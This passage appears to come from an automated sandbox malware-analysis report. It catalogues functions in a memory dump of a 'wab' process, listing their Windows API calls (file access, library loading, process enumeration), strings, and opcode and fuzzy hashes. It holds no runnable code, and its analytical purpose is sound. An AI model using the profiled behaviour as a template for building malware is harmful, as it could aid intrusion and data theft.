                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • GetLastError.KERNEL32 ref: 004175A2
                    • GetLastError.KERNEL32 ref: 004175A8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$FilePointer
                    • String ID:
                    • API String ID: 1156039329-0
                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ChangeCloseCreateFindNotificationTime
                    • String ID:
                    • API String ID: 1631957507-0
                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Temp$DirectoryFileNamePathWindows
                    • String ID:
                    • API String ID: 1125800050-0
                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: BINARY
                    • API String ID: 2221118986-907554435
                    • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                    • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                    Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                    • String ID:
                    • API String ID: 1161345128-0
                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /stext
                    • API String ID: 2081463915-3817206916
                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                    • String ID:
                    • API String ID: 159017214-0
                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                    Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                    Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: malloc
                    • String ID: failed to allocate %u bytes of memory
                    • API String ID: 2803490479-1168259600
                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                    Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset
                    • String ID:
                    • API String ID: 1065087418-0
                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                    • String ID:
                    • API String ID: 1481295809-0
                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$PointerRead
                    • String ID:
                    • API String ID: 3154509469-0
                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itowmemset
                    • String ID:
                    • API String ID: 4232544981-0
                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FileModuleName
                    • String ID:
                    • API String ID: 3859505661-0
                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                    Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                    Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
